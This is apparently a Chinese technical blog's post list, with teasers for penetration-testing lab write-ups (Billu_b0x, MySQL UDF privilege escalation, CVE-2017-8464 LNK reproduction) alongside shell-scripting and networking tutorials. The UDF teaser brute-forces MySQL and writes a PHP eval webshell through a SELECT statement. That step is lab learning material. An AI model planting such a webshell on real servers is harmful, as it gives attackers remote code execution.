- 博客(21)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Billu_b0x靶场复现
Billu_b0x靶场复现环境准备:Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址kali linux 2020虚拟机,ip地址192.168.120.133kali linux 2020虚拟机,ip地址192.168.120.1411.信息收集nmap -sP 192.168.1.0/24使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141主机发现
2022-04-29 11:38:11
597
原创 UDF靶场环境提权实战
UDF靶场环境提权实战Kali:192.168.221.130靶机主机:192.168.221.1361.nmap扫描主机2.扫描主机的服务:发现有80,135,139,445,1025,3306,33893.尝试爆破3306,爆破成功因开启了远程连接,使用navicat连接成功4.使用show variables like ‘%priv%’;查询结果为空,可以写入一句话木马写入一句话木马(需要猜测目录)SELECT “<?php eval($_POST['code']);
2022-04-29 00:15:16
2819
原创 shell脚本搭建b2c商城
shell脚本搭建b2c商城提前先将对应的软件包上传shell代码echo"已提前上传文件至opt目录"#关闭防火墙systemctl stop firewalldyum -y install unzip#jdk部署cd /opttar -zxvf jdk-8u151-linux-x64.tar.gzsed -e '10i export JAVA_HOME=/opt/jdk1.8.0_151' -e '10s/$/:$JAVA_HOME\/bin\//' /root/.bash_pro
2022-01-19 10:08:01
436
1
原创 shell脚本监控文件
SHELL脚本监控/etc/httpd/conf下所有文件,当出现修改后进行发邮件报警#!/bash/binif [ -d /bakfiles/files/ ];thenecho "已创建该文件"elsemkdir -p /bakfiles/filescp /etc/httpd/conf/* /backfiles/files/find /etc/httpd/conf -type f | xargs md5sum > /bakfiles/filesmd5.bakfiifcheck=$(
2022-01-08 14:12:22
840
原创 shell脚本设置访问控制防止暴力破解ssh
shell设置访问控制,多次失败登录即封掉IP,防止暴力破解ssh当发现某一台主机向服务器进行SSH远程管理,在10分钟内输错密码3次,使用firewalld进行响应, 禁止此IP再次连接,6个小时候后再次允许连接。一、系统:Centos7.1 64位二、方法:读取/var/log/secure,查找关键字 FailedJan 4 16:29:01 centos7 sshd[1718]: Failed password for root from 192.168.120.1 port 2171 s
2022-01-04 17:14:14
590
原创 使用shell脚本搭建httpd服务
使用shell脚本搭建httpd服务#! /bin/bash#脚本安装HTTP服务yum -y install wget make gcc pcre-devel apr-devel expat-devel libdb-devel cyrus-sasl-devel openldap-devel apr-util-devel&> /dev/nullwget http://dlcdn.apache.org//httpd/httpd-2.4.52.tar.gz &> /dev/n
2021-12-30 20:32:25
812
原创 sed命令修改ens33配置为静态ip
sed命令修改ens33配置为静态ip在shell脚本中使用sed通过设置ip配置文件为固定ip为192.168.1.1 255.255.255.0 192.168.1.254 114.114.114.144 8.8.8.8 sed -e '/BOOTPROTO/s/dhcp/static/' -e '$a\IPADDR=192.168.112.139' -e '$a\NETMASK=255.255.255.0' -e '$a\GATEWAY=192.168.112.1' -e '$a\DNS1=114
2021-12-30 17:29:40
2204
原创 shell脚本批量创建centos用户
shell脚本批量创建centos用户写一个菜单1)选择创建用户2)退出要求:如果选择1就去输入用户,继续选择1 继续输入用户继续选择1继续输入用户名。将3次输入的用户名放入到数组中,按2退出后将之前输入的用户全部创建,默认密码为123456 ( shell脚本:数组,case,for循环)#! /bin/bashecho "根据提示选择选项"i=0 #计数器select item in "creat" "exit"do case $item in "creat")
2021-12-30 11:25:16
1310
原创 使用shell编程输入月份,输出总的兔子数目的数列
如何使用shell编程当输入月份,输出总的兔子数目的数列(使用两种方法)(斐波那契数列)斐波那契数列(Fibonacci sequence),又称黄金分割数列、因数学家列昂纳多·斐波那契(Leonardoda Fibonacci)以兔子繁殖为例子而引入,故又称为兔子数列,指的是这样一个数列:1、1、2、3、5、8、13、21、34、……斐波纳契数列以如下被以递推的方法定义:F(1)=1,F(2)=1, F(n)=F(n-1)+F(n-2)(n>=3,n∈N*)*已知实验数据,编程实现实验使用
2021-12-30 08:30:00
318
原创 shell中循环问题
shell脚本试题:总分100,当分数85以上表示优秀,60以 上85以下表示合格,60以下表示不合格,当输入的不是一个两位或-位的数字, 就重新输入,使用两种方法。方法1#! /bin/bashwhile true;doread -p "请输入你的分数:" scoreecho $scoreif ((${score}<0||${score}>99));thenecho "请输入一个一位或者两位的数字!" elsebreakfidonecase $score in8[5
2021-12-29 14:38:50
317
2
原创 CVE-2017-8464远程命令执行漏洞复现
CVE-2017-8464远程命令执行漏洞复现攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。漏洞复现:利用原理:创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机
2021-12-29 10:59:03
899
原创 shell监控是否开启http服务
使用shell监控某台主机是否提供http服务#! /bin/bash#站点监控http服务read -p "请输入主机ip地址" ipcurl $ip &> /dev/nullif [ $? = 0 ];then echo "${ip}开启80端口"else echo "${ip}未开启80端口"fi相应截图思路:if判断,curl访问网站是否成功。成功返回开启80端口。...
2021-12-29 10:14:31
186
原创 虚拟局域网VLAN与其相关技术
虚拟局域网VLAN与其相关技术VLAN(虚拟局域网):是Virtual Local Area Network的简称。VLAN是将一个物理的LAN在逻辑上划分成多个广播域的通信技术,不同VLAN间不能够直接通信1.VLAN的优势控制广播增强网络安全性简化网络管理2.VLAN的种类静态VLAN基于端口划分静态VLAN。主要是在交换机上创建对应VLAN,并将交换机的接口加入到对应VLAN中。动态VLAN基于MAC地址划分VLAN。根据终端用户的MAC地址,决定属于哪一个V
2021-12-20 19:23:24
513
原创 路由器的知识点
路由器的知识点一.路由器工作在网络层TCP/IP协议定义了一个在因特网上传输的包,称为IP数据报,由首部和数据两部分组成。网络层的 IP 数据报TCP/IP协议定义了一个在因特网上传输的包,称为IP数据报,由首部和数据两部分组成。首部的前一部分是固定长度,共20字节,是所有IP数据报必须具有的。在首部的固定部分的后面是一些可选字段,其长度是可变的。首部中的源地址和目的地址都是IP协议地址。二.路由器工作原理路由器转发数据的过程接收数据包→查看目的IP地址→与路由表进行匹配找到转发端
2021-12-20 15:49:06
2230
原创 交换机的知识点
交换机交换机(Switch)意为“开关”是一种用于电(弱电,双绞线)(光)信号转发的网络设备。它可以为接入交换机的任意两个网络节点提供独享的电信号通路。最常见的交换机是以太网交换机。其他常见的还有电话语音交换机、光纤交换机等。在交换机内部维护了一张表,称为MAC地址表(端口地址表),端口地址表记录了端口下包含主机的MAC地址。端口地址表是交换机上电后自动建立的,保存在RAM中,并且自动维护。交换机隔离冲突域的原理是根据其端口地址表和转发决策决定的。交换机工作在数据链路层。(以太网)1.以太网地址(MAC
2021-12-20 09:21:52
1039
原创 计算机网络参考模型
计算机网络参考模型1.OSI 参考模型由于各个计算机厂商都采用私有的网络模型,因此给通信带来了诸多麻烦,ISO 于1984年颁布了 OSI 参考模型。OSI 是一个开放式体系结构,它规定将网络分为七层,从下往上依次是物理层、数据链路层、网络层、传输层、会话层、表示层和应用层每一层的功能:应用层:网络服务与最终用户的一个接口(将原始数据转换电脑能识别的二进制数)表示层:数据的表示、安全、压缩会话层:建立、管理、中止会话传输层:定义传输数据的协议端口号,以及流控和差错校验网络层:进行逻辑地址
2021-12-19 08:00:00
144
原创 Windows 基础命令使用
Windows 基础命令(cmd)一.目录与文件应用操作cd改变当前提示符盘符路径或提示符目录路径dir 命令用于显示某个磁盘或目录上的全部或部分文件目录md 命令用于创建目录或多级子目录rd 命令用于删除目录move 命令用于重命名文件或目录,并可以移动到指定位置copy 命令将一份或多份文件复制到另一个位置xcopy 命令复制指定文件或复制目录下的所有文件和子目录,并且会自动创建目标目录rname 命令重命名文件del 命令删除一个或多个文件二、文本处理type
2021-12-18 15:40:59
1859
原创 c++之九九乘法表
使用c++写一个九九乘法表不多说直接上代码#include <iostream>using namespace std;int main() { for(int i=1;i<10;i++) { for(int j=1;j<=i;j++) { cout<<i<<"*"<<j<<"="<<i*j<<" "; }cout<<endl;} return 0;}总结
2020-11-06 10:56:00
5078
1
Bandizip_7.06_Setup.exe免费版本
2022-01-05
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人